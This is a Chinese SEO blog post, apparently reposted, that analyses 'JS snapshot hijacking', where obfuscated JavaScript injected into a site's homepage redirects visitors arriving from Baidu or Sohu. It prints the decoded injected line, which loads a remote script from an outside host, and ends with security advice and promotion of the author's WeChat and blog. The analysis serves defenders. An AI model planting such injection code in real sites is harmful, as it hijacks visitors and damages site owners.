站长们经常遇到js快照劫持的问题,对网站的优化带来及大的影响。对于大多数新手站长来说js快照劫持,束手无策。今天无忧老师为大家进行一轮深度的解析。
一,js快照劫持示例
js快照劫持演示图,记录了是网站跳转的。文章源自张俊SEM-https://www.zhangjunsem.com/25634.html
一个是百度搜索快照劫持演示。另一个是搜狐搜索快照劫持演示。文章源自张俊SEM-https://www.zhangjunsem.com/25634.html
文章源自张俊SEM-https://www.zhangjunsem.com/25634.html
二,分析js快照劫持代码
经分析,网站首页被植入了恶意了代码,而且是多次加密JS代码。文章源自张俊SEM-https://www.zhangjunsem.com/25634.html
此段代码就是添加在网站首页的JS,而且属于了加密了的代码,一般看不出什么猫腻。文章源自张俊SEM-https://www.zhangjunsem.com/25634.html
三,加密JS层层分析
接下来进行JS反向解析分析。可以使用站长工具在线分析:http://tool.chinaz.com/js.aspx文章源自张俊SEM-https://www.zhangjunsem.com/25634.html
解析后,可以看到真面目,这段代码。文章源自张俊SEM-https://www.zhangjunsem.com/25634.html
< script type = "text/javascript" >
document.writeln("<script src=http://www.5121188.com/main2.js></script>"); < /script>文章源自张俊SEM-https://www.zhangjunsem.com/25634.html
打开这个main2.js可以看到一段落代码。文章源自张俊SEM-https://www.zhangjunsem.com/25634.html
攻击者真的多有精力,层层加密啊。怪不得一般站长根本无法发现。文章源自张俊SEM-https://www.zhangjunsem.com/25634.html
然后再进行解密。
这下大家应该清楚了,攻击者对代码进行了3次的加密再调用,来实现百度快照的JS劫持跳转。
四,网站安全建议
网站安全一直是一个让站长运营者头痛的问题,没有百分百安全的网站,只有一断的进行维护和优化,做到定期备份,定期检查,最大程度的杜绝网站被黑被劫持的风险。希望各位站长清楚并且牢记在心。
如果想要?我把整个JS快照劫持代码分析给大家,关注微信wuyouseo获取。
最后,在我的课程中也经常会分享一些网站安全小知识,请大家一定关注我的SEO博客www.ainiseo.com和微信公众号wuyousem,不断的分析干货教程和文章。
文章由 无忧老师分享,转载请注明出处。https://www.ainiseo.com/ 感谢你的阅读。
声明:转载此文是出于传递更多学习交流目的。若有来源标注错误或侵犯了您的合法权益,请作者持权属证明与本网联系,我们将及时更正、删除,谢谢。本站部分图文来源于网络,仅供学习交流,发表作品观点仅代表作者本人,本站仅提供信息存储空间服务,不承担连带责任。如有侵权,请及时联系管理员删除。
评论